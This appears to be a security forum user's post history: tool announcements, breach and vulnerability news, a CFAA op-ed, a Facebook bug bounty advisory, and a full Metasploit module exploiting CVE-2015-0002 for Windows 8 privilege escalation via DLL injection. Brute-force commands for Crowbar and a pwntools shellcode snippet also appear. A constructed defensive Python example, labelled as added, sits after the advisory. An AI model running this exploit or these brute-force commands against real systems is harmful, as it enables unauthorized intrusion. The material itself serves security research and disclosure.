Everything posted by Aerosol
-
I. Description
The OWASP ASVS Assessment Tool (OWAAT) has been developed by Mahmoud Ghorbanzadeh (mdgh (a) aut.ac.ir) at Amirkabir University of Technology's Computer Emergency Response Team (APA). OWAAT is a tool used to verify Web applications' security conformance to the OWASP Application Security Verification Standard (ASVS). OWAAT is a Web-based tool and provides team work capabilities. It allows users to create multiple assessment projects and assign assessment tasks to different users.

II. Installation
Please follow the installation wizard: http://YourWebSite/asvs/install/

III. Programs used (in alphabetical order)
Chosen: A jQuery Plugin by Harvest to Tame Unwieldy Select Boxes
iCheck: Checkboxes and radio buttons customization (jQuery and Zepto) plugin
intro: https://github.com/usablica/intro.js
jQuery File Upload: https://github.com/blueimp/jQuery-File-Upload
jQuery Notify: http://www.erichynds.com/blog/a-jquery-ui-growl-ubuntu-notification-widget
jTable: http://www.jtable.org/
TCPDF: http://www.tcpdf.org/ (Unnecessary program files have been deleted)
The OWASP ASVS Report Generator: http://ibuildingsnl.github.io/owasp-asvs-report-generator/index.html

Download: https://github.com/ghorbanzadeh/OWAAT
-
Nogotofail is a network security testing tool designed to help developers and security researchers spot and fix weak TLS/SSL connections and sensitive cleartext traffic on devices and applications in a flexible, scalable, powerful way. It includes testing for common SSL certificate verification issues, HTTPS and TLS/SSL library bugs, SSL and STARTTLS stripping issues, cleartext issues, and more. Download: https://github.com/google/nogotofail
-
Faraday introduces a new concept (IPE), Integrated Penetration-Test Environment, a multiuser penetration test IDE. Designed for distribution, indexation and analysis of the data generated during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way. Designed for simplicity, users should notice no difference between their own terminal application and the one included in Faraday. Developed with a specialized set of functionalities that help users improve their own work. Do you remember yourself programming without an IDE? Well, Faraday does the same as an IDE does for you when programming, but from the perspective of a penetration test. Download: https://github.com/infobyte/faraday
-
What is it?
Crowbar (crowbar) is a brute forcing tool that can be used during penetration tests. It is developed to brute force some protocols in a different manner from other popular brute forcing tools. As an example, while most brute forcing tools use username and password for SSH brute force, Crowbar uses SSH keys. So SSH keys that are obtained during penetration tests can be used to attack other SSH servers.

Currently Crowbar supports:
OpenVPN
SSH private key authentication
VNC key authentication
Remote Desktop Protocol (RDP) with NLA support

Installation
First you should install dependencies:
# apt-get install openvpn freerdp-x11 vncviewer
Then get the latest version from github:
# git clone https://github.com/galkan/crowbar
Attention: Rdp depends on your Kali version. It may be xfreerdp for the latest version.

Usage
-h: Shows help menu.
-b: Target service. Crowbar now supports vnckey, openvpn, sshkey, rdp.
-s: Target ip address.
-S: File name which stores target ip addresses.
-u: Username.
-U: File name which stores username list.
-n: Thread count.
-l: File name which stores log. Default file name is crowbar.log, which is located in your current directory.
-o: Output file name which stores the successful attempts.
-c: Password.
-C: File name which stores password list.
-t: Timeout value.
-p: Port number.
-k: Key file full path.
-m: Openvpn configuration file path.
-d: Run nmap in order to discover whether the target port is open or not, so that you can easily brute force the target using crowbar.
-v: Verbose mode which shows all the attempts including failures.
If you want to see all usage options, please use crowbar --help

Brute forcing RDP
Below are the examples which you have options for using crowbar.
RDP brute force attempt to a single IP address using a single username and a single password:
crowbar.py -b rdp -s 192.168.2.182/32 -u admin -c Aa123456
RDP brute force attempt to a single IP address using a username list file and a single password:
crowbar.py -b rdp -s 192.168.2.211/32 -U /root/Desktop/userlist -c passw0rd
RDP brute force attempt to a single IP address using a single username and a password list:
crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C /root/Desktop/passlist

Brute forcing SSH
Below are the examples which you have options for using crowbar.
SSH key brute force attempt to a single IP address using a single username and an ssh key:
crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k /root/.ssh/id_rsa
SSH key brute force attempt to a single IP address using a single username and an ssh key folder:
crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k /root/.ssh/
SSH key brute force attempt to a network using a single username and an ssh key folder in discovery mode:
crowbar.py -b sshkey -s 192.168.2.0/24 -u root -k /root/.ssh/ -d
Attention: If you want, you can specify the key directory with the -k option. Crowbar will use all the files under this directory for brute force. For instance:
# crowbar.py -k /root/.ssh

Brute forcing VNC server
Below is the example which you have options for using crowbar.
VNC brute force attempt to a single IP address using a passwd file with specified port number:
crowbar.py -b vnckey -s 192.168.2.105/32 -p 5902 -k /root/.vnc/passwd

Brute forcing OpenVPN
Below is the example which you have options for using crowbar.
VPN brute force attempt to a single IP address using a configuration file, a certificate file, a single username and a single password with specified port number:
crowbar.py -b openvpn -s 198.7.62.204/32 -p 443 -m /root/Desktop/vpnbook.ovpn -k /root/Desktop/vpnbook_ca.crt -u vpnbook -c cr2hudaF

Example Output
Once you have executed crowbar, it generates 2 files for logging and result that are located in your current directory. Default log file name is crowbar.log which stores all brute force attempts during execution. If you don't want to use the default log file, you should use -l log_path. The second file is crowbar.out which stores successful attempts during execution. If you don't want to use the default output file, you should use -o output_path. After that you can observe crowbar operations. Please look at the crowbar.log and crowbar.out files.

Download: https://github.com/galkan/crowbar
-
This is the CTF framework used by Gallopsled in every CTF.

from pwn import *
context(arch = 'i386', os = 'linux')

r = remote('exploitme.example.com', 31337)
# EXPLOIT CODE GOES HERE
r.send(asm(shellcraft.sh()))
r.interactive()

However, we have made command-line frontends for some of the functionality in pwnlib. These are:
asm/disasm: Small wrapper for various assemblers.
constgrep: Tool for finding constants defined in header files.
cyclic: De Bruijn sequence generator and lookup tool.
hex/unhex: Command line tools for doing common hexing/unhexing operations.
shellcraft: Frontend to our shellcode.
phd: Replacement for hexdump with colors.

Installation
pwntools is best supported on Ubuntu 12.04 and 14.04, but most functionality should work on any POSIX-like distribution (Debian, Arch, FreeBSD, OS X, etc.). Most of the functionality of pwntools is self-contained and Python-only. You should be able to get running quickly with
pip install pwntools
However, some of the features (ROP generation and assembling/disassembling foreign architectures) require non-Python dependencies. For more information, see the complete installation instructions here.

Download: https://github.com/Gallopsled/pwntools
-
Mozilla released the latest version of its flagship browser this week, Firefox 35, fixing nine vulnerabilities, including three critical bugs that could have led to a crash or sandbox bypass, among other issues. One of those critical bugs was a sandbox escape discovered by security researcher Nils. Nils, a researcher at MWR InfoSecurity in the U.K., found a way to break out of the Gecko Media Plugin (GMP) sandbox on Windows systems. If exploited, the hole could have let an attacker bypass the sandbox if it was combined with another GMP bug. The sandbox is apparently only used to host H.264 video playback, and the bug spared OS X and Linux and only affected Windows systems. The update also remedies a read-after-free bug in WebRTC dug up by researcher Mitchell Harper that stems from the way tracks are handled. This bug could have led to a crash or something the Mozilla Foundation calls incorrect WebRTC behavior. WebRTC is a free API overseen by the World Wide Web Consortium (W3C) that Firefox, along with other browsers like Chrome and Opera, use to help users communicate with other users. The Skype-like feature Firefox Hello that uses WebRTC was first incorporated into Firefox 34 last month. The last critical bug is really a handful of bugs attributed to a collection of Mozilla developers and community members. The issues, mostly memory safety bugs, “showed evidence of memory corruption under circumstances” according to the advisory issued on Tuesday. Researchers added “with enough effort at least some of these could be exploited to run arbitrary code.” Several other bugs, like a memory rendering issue that could lead to leaky web content, and vulnerabilities that could have enabled privilege escalation, were also fixed. As usual Mozilla has posted a brief summary of the security issues in the Advisory section of its site, but those seeking a comprehensive list of bugs fixed can find them on Mozilla’s Bugzilla site. Source
-
A malvertising scheme has hijacked at least two distinct Google AdWords advertising campaigns, redirecting users who had browsed to the sites hosting the poisoned ads without those visitors even clicking on them. Some of the sites in question service more than a million monthly users. Last week, website security firm Sucuri noticed a substantial uptick in requests to scan sites for malware. Oddly enough, the malicious redirects did not discriminate among platforms nor browsers, but some visitors were not redirected while others complained that impacted sites became barely usable. The reason for that has to do with the way online advertising firms use mined data to target ads toward supposedly relevant customers. In extreme cases, advertisers deploy real-time ad-bidding, in which groups compete for seconds or minutes of ad space on particular sites at specific times. The infected ads redirected users to convincing-looking but ultimately fraudulent magazine websites with articles containing fake comments and endorsements for health secrets and intelligence boosting tricks. Some of the landing pages masqueraded as real magazines, like Forbes. The redirects occurred even in the Google AdReview center, a sort of administrative panel where site operators can review the advertisements that AdWords intends to post on their site. https://www.youtube.com/watch?v=noTYMDjWbIQ Eventually, the Sucuri researchers managed to isolate the bad ads: Anonymous advertiser adv-2646721236434373 with ads pointing toward adwynn[dot]com and Blackburn ART where ads pointed to rgeoffreyblackburn[dot]com. Each ad firm, the researchers say, seemed legit and must have been hijacked at some point by the people perpetrating the scam. “I don’t know what prevented Google to suspend those accounts right away,” Sucuri wrote. “Maybe their budgets? According to the reports in [a Google production forum], quite a few large sites with millions of monthly page views suffered from those malicious ads. 
And I suspect those banners may have been displayed more than a million times since December across all the sites with AdSense ads.” Source
-
I'm back with an update: Suricata IDPE 2.0.6

Changes:
Evasion issues fixed.
Various bug fixes and improvements.

Suricata Stable release is available here. The current version is 2.0.6, released January 15, 2015.
Linux/Mac/FreeBSD/UNIX/Windows Source: https://www.openinfosecfoundation.org/download/suricata-2.0.6.tar.gz
PGP Signature: https://www.openinfosecfoundation.org/download/suricata-2.0.6.tar.gz.sig
Windows (win32) installer: https://redmine.openinfosecfoundation.org/attachments/download/1061/Suricata-2.0.5-1-32bit.msi
-
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'

class Metasploit3 < Msf::Exploit::Local
  Rank = NormalRanking

  include Exploit::EXE
  include Msf::Post::File
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Microsoft Windows NtApphelpCacheControl Improper Authorization Check',
      'Description'    => %q{
        On Windows, the system call NtApphelpCacheControl (the code is actually in ahcache.sys)
        allows application compatibility data to be cached for quick reuse when new processes are
        created. A normal user can query the cache but cannot add new cached entries as the
        operation is restricted to administrators. This is checked in the function
        AhcVerifyAdminContext.

        This function has a vulnerability where it doesn't correctly check the impersonation token
        of the caller to determine if the user is an administrator. It reads the caller's
        impersonation token using PsReferenceImpersonationToken and then does a comparison between
        the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level of
        the token so it's possible to get an identify token on your thread from a local system
        process and bypass this check.

        This module currently only affects Windows 8 and Windows 8.1, and requires access to
        C:\Windows\System\ComputerDefaults.exe (although this can be improved).
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'James Forshaw',
        'sinn3r'
      ],
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'Arch'           => [ARCH_X86, ARCH_X86_64],
      'DefaultOptions' => {
        'EXITFUNC' => 'thread',
      },
      'Targets'        => [
        [ 'Windows 8 / Windows 8.1 (x86 and x64)', {} ]
      ],
      'DefaultTarget'  => 0,
      'Payload'        => {
        'Space'       => 4096,
        'DisableNops' => true
      },
      'References'     => [
        [ 'CVE', '2015-0002' ],
        [ 'OSVDB', '116497' ],
        [ 'EDB', '35661' ],
        [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=118']
      ],
      'DisclosureDate' => 'Sep 30 2014'
    }))
  end

  def temp
    @temp ||= get_env('TEMP').to_s
  end

  def payload_filepath
    @payload_filepath ||= "#{temp}\\#{Rex::Text.rand_text_alpha(6)}.dll"
  end

  def upload_payload_dll(payload_filepath)
    payload = generate_payload_dll({:dll_exitprocess => true})

    begin
      write_file(payload_filepath, payload)
    rescue Rex::Post::Meterpreter::RequestError => e
      fail_with(
        Failure::Unknown,
        "Error uploading file #{payload_filepath}: #{e.class} #{e}"
      )
    end
  end

  def upload_payload
    print_status("Payload DLL will be: #{payload_filepath}")

    # Upload the payload
    upload_payload_dll(payload_filepath)

    if !file?(payload_filepath)
      fail_with(Failure::Unknown, "Failed to save the payload DLL, or got removed. No idea why.")
    end
  end

  def inject_exploit(process)
    lib_file_path = ::File.join(
      Msf::Config.data_directory, "exploits", "ntapphelpcachecontrol", 'exploit.dll'
    )

    print_status("Creating thread")
    exploit_mem, offset = inject_dll_into_process(process, lib_file_path)
    var_mem = inject_into_process(process, payload_filepath)
    process.thread.create(exploit_mem + offset, var_mem)
  end

  def prep_exploit_host
    process = nil
    notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})

    begin
      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
    rescue Rex::Post::Meterpreter::RequestError
      process = client.sys.process.open
    rescue ::Exception => e
      elog("#{e.message}\nCall stack:\n#{e.backtrace.join("\n")}")
    end

    process
  end

  def check
    if sysinfo['OS'] =~ /Windows 8/
      # Still an 0day, but since this check doesn't actually trigger the vulnerability
      # so we should only flag this as CheckCode::Appears
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    if session.platform !~ /^x86\//
      print_error("Sorry, this module currently only allows x86/win32 sessions.")
      print_error("You will have to get a x86/win32 session first, and then you can")
      print_error("select a x64 payload as this exploit's payload.")
      return
    end

    print_status("Uploading the payload DLL")
    upload_payload

    proc = prep_exploit_host
    if !proc
      fail_with(Failure::Unknown, "Failed to get a notepad.exe to run (to host the exploit)")
    end

    print_status("Injecting exploit into PID #{proc.pid}")
    inject_exploit(proc)
  end

end

Source
-
What a strange time. Last week I was literally walking the red carpet at the Hollywood premiere of Michael Mann’s Blackhat, a crime thriller that I had the good fortune to work on as a “hacker adviser” (my actual screen credit). Today, all I’m thinking is, please, God, don’t let anybody in Congress see the film. I’ll explain my anxiety in a minute. First, the movie: Mann, the legendary director of hardboiled crime films like Heat, Collateral, and Miami Vice, always has been a stickler for authenticity, and he brought me into Blackhat as an adviser early on, before it had a title or a lead actor. If you’re wondering how one gets involved in a Michael Mann film, here’s how it works: Mann calls you on the phone. You think, “Why is Michael Mann calling me?” After a phone conversation and an interview in Los Angeles, you’re officially invited on board as a consultant. It turned out Blackhat’s screenwriter had read my cybercrime book Kingpin, and he’d suggested me to Mann. When I showed up for my first consulting meeting, I expected to find a roomful of people crowded around a long conference table. Instead, it was just me and Mann, sitting in his office for five hours at a time. He had questions about malware, hacking, how modern computer intrusions play out. For subsequent meetings, I was given the current iteration of the screenplay (watermarked with my name, lest I leak it to the Pirate Bay), and we went over it line by line, looking at dialogue, discussing tweaks to the hacking and forensics scenes, and working on some of the procedural elements in the plot. Later, Mann brought in a second computer consultant, OkCupid hacker Chris McKinley, to write code for the movie and train leading man Chris Hemsworth in Linux basics, making Hemsworth officially the best-looking human to ever use a command line. The result is in theaters today. 
I think Blackhat is an awesome movie: stylish, breathtakingly beautiful at times, and close to the metal in depicting a no-longer-scifi world where cybercrime is serious, profitable, and well-funded. I’m biased, of course, because of my involvement, and because I’ve been a fan of Mann’s work since the ’80s. (In one meeting with him I embarrassed myself by recalling the name of the villain in the Miami Vice pilot, which he himself had forgotten.) Overall, the movie seems to be drawing radically polarized reviews, but I’m gratified that security geeks who’ve seen it have given it good grades on authenticity. It wasn’t until this week—Tuesday evening, to be exact—that my anxiety over the timing of the movie set in. That’s when the White House released its legislative proposal to “reform” US computer crime policy in reaction to the Sony breach. President Obama plans to formally announce it at the State of the Union next Tuesday, but the details are public now. And many are troubling. The general thrust of the proposal is to broaden the reach of the Computer Fraud and Abuse Act, and boost penalties for violations. The White House proposal will quadruple the maximum possible sentence for some crimes from five years to 20. And where under current law some hacks are misdemeanors—specifically a first-time offense that doesn’t involve credit cards or more than $5,000 in information—those crimes will now be felonies. Additionally, CFAA violations would qualify for prosecution under the mob-busting RICO statute, meaning, for example, if a member of Anonymous is busted in a petty denial-of-service attack, she might now be held legally accountable for every cybercrime Anonymous has committed. More disturbingly, the proposal includes sweeping language that directly impairs legitimate security work. It makes it newly illegal to “traffic” in any “means of access” into a computer if you have reason to know that someone will use it illegally. 
Releasing or using hacking code is a staple of cyber security work. Researchers publish it to demonstrate and describe the vulnerabilities they find, and professional white hats use it to audit their customers’ networks. Like many security tools, bad guys can use the software too, and they do. But a sober computer crime proposal doesn’t ban tools that benefit thousands of people because one of them is a criminal. Security expert Robert Graham notes that even circulating a link could be considered a felony under the proposal. Obama has struggled and failed to get similar CFAA changes through Congress in the past, but this time he has the Sony hack behind him—and now Blackhat. If it’s farfetched to think lawmakers will be swayed by a work of Hollywood fiction, consider that it’s happened before. Congress passed the original CFAA in 1984 in direct response to the seminal hacker flick Wargames. Politicians who saw the film felt an urgent need to punish hackers, lest one of them blunder into NORAD and trigger World War III. The result was a law that—after several revisions—led to cases like the Lori Drew and Andrew Auernheimer misfires: People charged for lying in their social networking profiles or conspiring to access an unpublished URL. In one recent case I wrote about, two gamblers were charged under the CFAA for exploiting a bug in video poker machines to beat the house. Following the suicide of hacker activist Aaron Swartz two years ago, a proposal to put limits on the CFAA floated through the halls of Congress and out a window, never to be seen again. Now Obama is looking to go the other way and make the CFAA more powerful. Don’t mistake Obama’s proposal for meaningful action, though. Computer crime sentences have already smashed through the ceiling of efficacy. At this very moment there are hackers, and even low-level credit card fraudsters, serving 20 year terms, and that didn’t deter the Sony intruders. 
As for the “trafficking” prohibition, when hacking tools are outlawed … well, you know the rest. Nevertheless, I can say with absolute confidence that a lawmaker will soon be standing on the floor of Congress talking about Blackhat in the same breath as the Sony intrusion, railing about the grave threat to American lives that computer hacking poses if the president’s proposal isn’t enacted. I mean, this is a film in which malware makes a Chinese nuclear plant explode in the opening scene. So let me say now to any politicians reading this, as one of the people who helped make Blackhat feel authentic, nuclear plants are not exploding. And if you think they might, then you should direct your efforts to locking down critical systems. Pour money into research, offer incentives for organizations to invest in security, pass disclosure laws that require public reporting of breaches, so consumers can hold negligent companies accountable. Blindly boosting sentences for the few hackers who get caught will do nothing to help. And outlawing security tools just because they can be abused will only aid the real blackhats. Disclosure: As a hacker 20 years ago, the author pleaded guilty under an uncontroversial application of the CFAA. Source
-
The Twitter accounts of the New York Post and United Press International (UPI) have been hacked with fake tweets on economic and military news. In one post, the Pope was quoted on UPI's Twitter feed as saying that "World War III has begun". Meanwhile, the New York Post's account said that hostilities had broken out between the United States and China. It is the latest hack of a high-profile social media account, four days after US military command was compromised. UPI, which is based in Washington, confirmed in a statement that both its Twitter account and news website had been hacked. Six fake headlines were posted on its Twitter account and a breaking news banner was added to a fake story about the Federal Reserve on its homepage, the statement added. A tweet on the New York Post's account said the USS George Washington, an aircraft carrier, was "engaged in active combat" against Chinese warships in the South China Sea. A Pentagon official said the tweet about hostilities with China was "not true", AFP reports. The tweets have all since been deleted. The New York Post says it is investigating the hack. It comes just days after US President Barack Obama unveiled proposals to strengthen cyber security laws after a spate of attacks on high-profile US targets, including the Pentagon Twitter feed and Sony Pictures. The Twitter account of the US military command was suspended last Monday following an attack by hackers claiming to support Islamic State. In November hackers also released reams of confidential data stolen from Sony Pictures, and in recent years cyber criminals have attacked other US companies such as Home Depot and Target. A number of media organisations, including AFP and the BBC, have also been subjected to cyber attacks over the past two years. Source
-
Document Title:
===============
Facebook Bug Bounty #19 - Filter Bypass Web Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1381

Facebook Security ID: 221374210

Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/01/14/facebook-bug-bounty-restriction-filter-bypass-vulnerability-id-221374210

Release Date:
=============
2015-01-14

Vulnerability Laboratory ID (VL-ID):
====================================
1381

Common Vulnerability Scoring System:
====================================
3.5

Product & Service Introduction:
===============================
Facebook is an online social networking service, whose name stems from the colloquial name for the book given to students at the start of the academic year by some university administrations in the United States to help students get to know each other. It was founded in February 2004 by Mark Zuckerberg with his college roommates and fellow Harvard University students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris Hughes. The website's membership was initially limited by the founders to Harvard students, but was expanded to other colleges in the Boston area, the Ivy League, and Stanford University. It gradually added support for students at various other universities before opening to high school students, and eventually to anyone aged 13 and over. Facebook now allows any users who declare themselves to be at least 13 years old to become registered users of the site. Users must register before using the site, after which they may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics, and categorize their friends into lists such as "People From Work" or "Close Friends".

As of September 2012, Facebook has over one billion active users, of which 8.7% are fake. According to a May 2011 Consumer Reports survey, there are 7.5 million children under 13 with accounts and 5 million under 10, violating the site's terms of service. In May 2005, Accel partners invested $12.7 million in Facebook, and Jim Breyer added $1 million of his own money to the pot. A January 2009 Compete.com study ranked Facebook as the most used social networking service by worldwide monthly active users. Entertainment Weekly included the site on its end-of-the-decade "best-of" list, saying, "How on earth did we stalk our exes, remember our co-workers' birthdays, bug our friends, and play a rousing game of Scrabulous before Facebook?" Facebook eventually filed for an initial public offering on February 1, 2012, and was headquartered in Menlo Park, California. Facebook Inc. began selling stock to the public and trading on the NASDAQ on May 18, 2012. Based on its 2012 income of USD 5.1 Billion, Facebook joined the Fortune 500 list for the first time, being placed at position 462 on the list published in 2013.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Facebook )

Abstract Advisory Information:
==============================
The independent Vulnerability Laboratory Researcher Paulos Yibelo discovered a limitation bypass vulnerability in the official Mobile Site and mobile app (android/ios).

Vulnerability Disclosure Timeline:
==================================
2014-12-10: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security)
2014-12-11: Vendor Notification (Facebook Security Team - Bug Bounty Program)
2014-12-15: Vendor Response/Feedback (Facebook Security Team - Bug Bounty Program)
2015-01-12: Vendor Fix/Patch (Facebook Developer Team - Reward: Bug Bounty)
2015-01-14: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A restriction/limitation bypass web vulnerability has been discovered in the official Facebook Mobile web-application framework. Facebook limits a name change for 60 days before a new name is applied. The advisory explains how I was able to bypass the restriction to change my "Alternative name" using parameter session tampering.

First the attacker uses a restricted account (60 day) and reviews the changes by using a session tamper. By a permanent exchange of the name values the service updates the name value through the mobile service without usage of the secure restriction mechanism. Remote attackers are able to bypass the restriction to exploit the vulnerability. The attack vector of the issue is located on the application side and the request method to inject is POST. Using this bug, a local attacker (a logged in user) can impersonate other users to manipulate their friends and change back to their account name (bypassing the 60-day restriction).

The security risk of the filter bypass vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the filter mechanism vulnerability requires a low privileged web-application user account without user interaction. Successful exploitation of the bypass issue results in unauthorized account name changes through alternative name inputs.

Request Method(s):
[+] POST

Vulnerable Service(s):
[+] Facebook - Mobile Website
[+] Facebook Apps - Apple iOS & Android

Vulnerable Module(s):
[+] ./settings/account/

Vulnerable Parameter(s):
[+] name

Proof of Concept (PoC):
=======================
The bypass vulnerability can be exploited by remote attackers with a restricted user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Requirements: Attacker needs an account that changed its name and is limited for 60 (x) days before making any other changes

Manual steps to reproduce the vulnerability ...
1. Go to https://m.facebook.com/settings/account/?name&refid=70
2. Click review changes and tamper the request, change the value of alternative name to anything
3. Continue the request and save the changed value
4. Submit request, then enter your test account password
5. Name value is changed even if time restriction was set
Note: Alternative name shall then be updated too
6. Facebook vulnerability successfully exploited!

Reference(s):
https://m.facebook.com/settings/account/?name&refid=70

Security Risk:
==============
The security risk of the restriction/limitation bypass vulnerability in the change name function is estimated as medium. (CVSS 3.5)

Credits & Authors:
==================
Paulos Yibelo (paulosyibelo.com)

Source
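The bypass above comes down to a cooldown that was enforced for one field on one path but not for the alternative-name field reached through the mobile endpoint. As an added example (not code from the advisory, the researcher or Facebook), here is a constructed "before" handler with exactly that gap next to a hardened one that takes a single server-side cooldown decision for every name-bearing field before anything is written; the Account model, field names and sample request are assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, Optional

NAME_CHANGE_COOLDOWN = timedelta(days=60)
# Every field that feeds the displayed identity must sit under the same cooldown;
# leaving one of them out is the gap the advisory describes.
NAME_FIELDS = ("name", "alternative_name")


@dataclass
class Account:
    name: str
    alternative_name: str = ""
    # Server-side timestamp of the last successful name change (None = never).
    name_changed_at: Optional[datetime] = None


class CooldownActive(Exception):
    """A name-bearing field was changed inside the cooldown window."""


def _in_cooldown(account: Account, now: datetime) -> bool:
    return (account.name_changed_at is not None
            and now - account.name_changed_at < NAME_CHANGE_COOLDOWN)


def vulnerable_mobile_update(account: Account, form: Dict[str, str],
                             now: datetime) -> Account:
    """Constructed 'before' handler: the cooldown guards only the 'name' field.

    A POST body tampered to carry 'alternative_name' instead of 'name' is
    applied without any restriction check.
    """
    if "name" in form:
        if _in_cooldown(account, now):
            raise CooldownActive("name was changed less than 60 days ago")
        account.name = form["name"]
        account.name_changed_at = now
    if "alternative_name" in form:  # no cooldown check on this path
        account.alternative_name = form["alternative_name"]
    return account


def hardened_mobile_update(account: Account, form: Dict[str, str],
                           now: datetime) -> Account:
    """Constructed 'after' handler: one policy decision for every name field.

    The decision is taken once, from server-side state, before anything is
    written, so which field or endpoint the client used no longer matters.
    """
    requested = {k: v for k, v in form.items() if k in NAME_FIELDS}
    changed = {k: v for k, v in requested.items() if v != getattr(account, k)}
    if not changed:
        return account  # no identity change requested, nothing to restrict
    if _in_cooldown(account, now):
        unlock = account.name_changed_at + NAME_CHANGE_COOLDOWN
        raise CooldownActive(
            f"identity fields locked until {unlock:%Y-%m-%d}: {sorted(changed)}")
    for k, v in changed.items():
        setattr(account, k, v)
    account.name_changed_at = now  # server clock, never a client-supplied value
    return account


def demo() -> Dict[str, str]:
    """Replays the advisory's tampered request (constructed) against both handlers."""
    now = datetime(2015, 1, 10)

    def recently_changed() -> Account:  # name changed 5 days ago: still locked
        return Account("Test User", "Tester",
                       name_changed_at=now - timedelta(days=5))

    # Tampered POST body: the 'name' field swapped for 'alternative_name'.
    tampered = {"alternative_name": "Someone Else"}
    results: Dict[str, str] = {}
    results["vulnerable"] = vulnerable_mobile_update(
        recently_changed(), tampered, now).alternative_name
    try:
        hardened_mobile_update(recently_changed(), tampered, now)
        results["hardened"] = "accepted"
    except CooldownActive:
        results["hardened"] = "rejected"
    # Same request once the 60-day window has passed: legitimately accepted.
    results["hardened_after_window"] = hardened_mobile_update(
        recently_changed(), tampered, now + timedelta(days=60)).alternative_name
    return results


if __name__ == "__main__":
    print(demo())
```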
-
Hi sanki and welcome! As for Register Users, Bautor de ceai/bere/vin/palinca/gin/whiskey... those are ranks set by the number of posts.
-
Congratulations man, may it bring you luck and may you receive a substantial "reward"!
-
The US National Security Agency (NSA) has offered some sort of apology for pushing insecure cryptography solutions to businesses, describing it as a "regrettable" move. Michael Wertheimer, director of research at the NSA, made the admission about the agency's support of the widely criticised Dual Elliptic Curve Deterministic Random Bit Generator (Dual EC DRBG) in a letter published by the American Mathematical Society (PDF). Dual EC DRBG is a random number generator used by numerous encryption systems that was supported by the NSA throughout the 2000s. The NSA endorsement was a key factor that led the US National Institute of Standards and Technology (NIST) to list the generator as trustworthy. Security firm RSA subsequently integrated Dual EC DRBG into its widely used BSAFE toolkits, despite research from Microsoft and private experts, including cryptography expert Bruce Schneier, suggesting there were backdoors in the system. Reports subsequently broke alleging that the NSA paid RSA $10m to load the tool with the flawed algorithm. RSA has consistently denied this claim. The allegations gained new weight in 2014 when documents leaked by Edward Snowden suggested that ties between the NSA and RSA were deeper than first thought. Addressing these claims, Wertheimer said: "With hindsight, the NSA should have ceased supporting the Dual EC DRBG algorithm immediately after security researchers discovered the potential for a trapdoor. "In truth, I can think of no better way to describe our failure to drop support for the Dual EC DRBG algorithm as anything other than regrettable." He added that the reason for the continued support was a mistaken belief that deploying a new algorithm would be too costly. "The costs to the Defense Department to deploy a new algorithm were not an adequate reason to sustain our support for a questionable algorithm," read the letter. "Indeed, we support NIST's April 2014 decision to remove the algorithm. 
Furthermore, we realise that our advocacy for the Dual EC DRBG casts suspicion on the broader body of work the NSA has done to promote secure standards." Wertheimer went on to apologise to the maths research community and request that they "continue" to trust the NSA. "NSA mathematicians are fighters in the war on international terrorism, weapons of mass destruction proliferation, narcotics trafficking and piracy," read the report. "It is my sincerest hope that the American Mathematical Society will always see NSA mathematicians as an important part of its membership. "I further hope that dialogue on important issues will always be respectful, informed and focused on inclusivity." The claim has divided the security community, some expressing sympathy towards the NSA and others questioning its cries of innocence. Professor Alan Woodward, of the School of Computer Science at University of Surrey, told V3 that the dangers of pushing a faulty security system far outweigh the benefits for intelligence agencies, such as the NSA. "It is worth remembering that part of the NSA's role is to help secure US government communications as well as gathering foreign intelligence," he said. "It's a bit of a truism but worth repeating: if you deliberately weaken encryption for one set of people whom you consider adversaries, you will weaken it for those you seek to protect as well. "I can imagine that the NSA and every single other signals interception organisation are looking for ways to decrypt internet-based communications. "But I think most realise the dangers of trying to deliberately weaken what is in use. At least I really hope they do." Matthew Green, assistant research professor at the Information Security Institute of Johns Hopkins University, was less positive, pointing out that the NSA still hasn't said why it pushed the standard in the first place, given its technical expertise. 
"On closer examination, the letter doesn't express regret for the inclusion of Dual EC DRBG in national standards," he noted in a public post. "The transgression Dr Wertheimer identifies is merely that the NSA continued to support the algorithm after major questions were raised. That's bizarre. "It troubles me to see such confusing statements in a publication of the American Mathematical Society. As a record of history, Dr Wertheimer's letter leaves much to be desired, and could easily lead people to the wrong understanding. "Given the stakes, we deserve a more exact accounting of what happened with Dual EC DRBG. I hope someday we'll see that." Wertheimer's comments come during a heated debate about encryption. UK prime minister David Cameron announced plans on 13 January to block encrypted services as a part of a wave of new surveillance laws. Source
-
oclHashcat+ Advanced GPU Hash Cracking Utility 1.32
Download
clHashcat For NVidia 1.32
Download
-
OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols with full-strength cryptography world-wide. Changes: Build fixes for the Windows and OpenVMS platforms. Download
-
